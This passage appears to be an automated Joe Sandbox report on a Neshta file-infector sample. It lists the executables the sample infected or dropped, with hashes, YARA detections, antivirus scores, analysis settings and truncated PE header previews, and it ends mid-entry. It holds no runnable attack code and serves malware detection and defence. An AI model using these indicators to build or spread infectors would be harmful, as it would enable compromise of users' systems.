                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 97% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 91% | Metadefender |
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 94% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 96% | ReversingLabs | Win32.Virus.Neshta
                  C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 96% | ReversingLabs | Win32.Virus.Neshta

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  0.2.Z68mMCAxFZ.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A
                  0.0.Z68mMCAxFZ.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox Version: 33.0.0 White Diamond
                  Analysis ID: 490869
                  Start date: 26.09.2021
                  Start time: 16:52:32
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 10m 20s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Sample file name: Z68mMCAxFZ.exe
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of new started processes analysed: 16
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.rans.spre.troj.evad.winEXE@5/111@0/0
                  EGA Information: Failed
                  HDC Information:
                  • Successful, ratio: 49.6% (good quality ratio 47.9%)
                  • Quality average: 82.8%
                  • Quality standard deviation: 26.5%
                  HCA Information: Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 23.54.113.53, 204.79.197.222, 204.79.197.200, 13.107.21.200, 20.82.209.183, 23.0.174.200, 23.0.174.185, 20.50.102.62, 209.197.3.8, 23.10.249.26, 23.10.249.43, 20.54.110.249
                  • Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a-0019.standard.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  Match: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe

                  Associated Sample Name / URL | Detection
                  6LkjS4JhAl.exe | malicious
                  09876523456789.exe | malicious
                  Y4pMlX1fO2.exe | malicious
                  B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe | malicious
                  1J5sT000kJ.exe | malicious
                  ij99opH1kI.exe | malicious
                  McAfeeStingerPortable.exe | malicious
                  javaw.exe | malicious
                  javaw.exe | malicious
                  Lw6h2Z5Lg5.exe | malicious
                  Shipping documentsProforma invoice.exe | malicious
                  je60o4s3gS.exe | malicious
                  8doUcc9Dn2.exe | malicious
                  y9pE5n5u9D.exe | malicious
                  wVdurpHHFa.exe | malicious
                  smHWkWDwfX.exe | malicious
                  dVUsIZmrvk.exe | malicious
                  wIAWmUGebs.exe | malicious
                  lAFVkA8CLk.dll | malicious
                  PgIBHusOv7.exe | malicious

                                                          Created / dropped Files

                                                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.278258254187173
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCctJ77qzWk6AM2oS/xePB:sr85CctdeKzC/y
                                                          MD5:E47F8A2ECDC2D4BFBBB6328B1391F1CC
                                                          SHA1:A633C3106A89C083014FC9F29D559B70E93D6D69
                                                          SHA-256:8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
                                                          SHA-512:6A9088AA04F3BC6F57AAFDAC45B3C52A0668431CA373BA6E8C034717FEE10BE90B2E7F806178A26151D040B3087F708A08219AAC3B2F4553AA5D84E36BE86EC6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Joe Sandbox View:
                                                          • Filename: 6LkjS4JhAl.exe, Detection: malicious, Browse
                                                          • Filename: 09876523456789.exe, Detection: malicious, Browse
                                                          • Filename: Y4pMlX1fO2.exe, Detection: malicious, Browse
                                                          • Filename: B513104971C9E0C5B6721A523C9475701A67BB368A74F.exe, Detection: malicious, Browse
                                                          • Filename: 1J5sT000kJ.exe, Detection: malicious, Browse
                                                          • Filename: ij99opH1kI.exe, Detection: malicious, Browse
                                                          • Filename: McAfeeStingerPortable.exe, Detection: malicious, Browse
                                                          • Filename: javaw.exe, Detection: malicious, Browse
                                                          • Filename: javaw.exe, Detection: malicious, Browse
                                                          • Filename: Lw6h2Z5Lg5.exe, Detection: malicious, Browse
                                                          • Filename: Shipping documentsProforma invoice.exe, Detection: malicious, Browse
                                                          • Filename: je60o4s3gS.exe, Detection: malicious, Browse
                                                          • Filename: 8doUcc9Dn2.exe, Detection: malicious, Browse
                                                          • Filename: y9pE5n5u9D.exe, Detection: malicious, Browse
                                                          • Filename: wVdurpHHFa.exe, Detection: malicious, Browse
                                                          • Filename: smHWkWDwfX.exe, Detection: malicious, Browse
                                                          • Filename: dVUsIZmrvk.exe, Detection: malicious, Browse
                                                          • Filename: wIAWmUGebs.exe, Detection: malicious, Browse
                                                          • Filename: lAFVkA8CLk.dll, Detection: malicious, Browse
                                                          • Filename: PgIBHusOv7.exe, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.3372362912074625
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCpbQILFkbeumIkA39xSZW175V7UZQx:sr85Cp8LRkgUA1nQZs
                                                          MD5:10075707D5C79CDACFE09DEF9C6D4985
                                                          SHA1:7D1DD5FB7DBBCC8563911BDB3C40B244FD03C634
                                                          SHA-256:3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
                                                          SHA-512:C31030085A5D2C15DCE1B9B5EA1727CF36CC4F3AC71A5F5715086342669D9E3E2D0BA213ECC00D9A18D792122332BB6DF2EE05B146CA83AF279E3C4CE80B821D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.220006974675465
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCbO/DiMgT0O8ahUMJD/dt7:sr85CSPm8aVJD37
                                                          MD5:F447C4B446D5889225A9D9082145AD88
                                                          SHA1:A1A380F3D3402F243E1A213C39E969D2C24CA99E
                                                          SHA-256:C34D1F919C306D2F2959C932CAC15FBED433AD465F71C50270DA27803952B829
                                                          SHA-512:E62F7E4F3E7EDE368CA0ECB242BF9AD12124AE92A61AF9BD97CA47E1457B842D84BC16105EE84EC201B948C31E613046F92DA4635EF2061638BD40EC797435AB
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.356945716242827
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC8xXHWVxZs58xP3RFA+8j/Em8kjkO:sr85CHVxZo8xP3RFA+m/Em8St
                                                          MD5:DE64003856A8B74AEAF33E247AF9424B
                                                          SHA1:912E6F9C6B1103AAFEC7F30FE3B0F9C3F55D6650
                                                          SHA-256:A39859FB4CB6693CDB686B3501C0178DFF81D27375C0086805F09ABF45284F64
                                                          SHA-512:4D2B92577F21183B5BF72DDA2DA4750099F198AA086FD68DDCCB43C686E1A8949E834E72D8E7FEAC05DA4F080D54C12BC1A7A5E2DEE36DFF3B92A4931BF1FE8D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Reputation:moderate, very likely benign file
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.486359083061706
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJw0L11g2ncA7932EDoh3hG2xS79o5kUt:JxqjQ+P04wsmJCt2ce3ExA89/I+b
                                                          MD5:D972E8BC4F221D69D9DF89999B74C311
                                                          SHA1:3A43D069389EFDBA178DCF16EBF4A45A8B09F0F9
                                                          SHA-256:8E0F471BC8BAEBB5FBC3C65A9C6C75B3F23B4E94AC4C07054DAD643CEBDCA103
                                                          SHA-512:DDA8C29088E907E0B429E560CC21FD2B5C7EF0736456A30BAA3FF08AC85C73487471E6164CE8872AFA7E7B8604AE6A5882A748140B4ADBA142EBB0CC6560E7B6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.5232250585402545
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                          MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                          SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                          SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                          SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.186107093668235
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                          MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                          SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                          SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                          SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.667436230875162
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                          MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                          SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                          SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                          SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.461209967778202
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                          MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                          SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                          SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                          SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.302303877870808
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                          MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                          SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                          SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                          SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.261294291615621
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                          MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                          SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                          SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                          SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 97%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.423139673646388
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                          MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                          SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                          SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                          SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.355719905315724
                                                          Encrypted:false
